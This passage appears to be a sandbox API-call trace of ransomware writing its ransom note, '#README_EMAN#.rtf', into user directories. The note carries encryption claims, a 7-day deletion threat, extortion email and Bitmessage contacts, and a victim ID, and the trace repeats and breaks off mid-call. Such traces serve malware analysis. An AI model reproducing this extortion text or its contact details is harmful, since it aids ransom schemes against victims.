n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.361] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.362] CloseHandle (hObject=0x294) returned 1 [0273.362] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0273.362] GetLastError () returned 0x2 [0273.362] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, 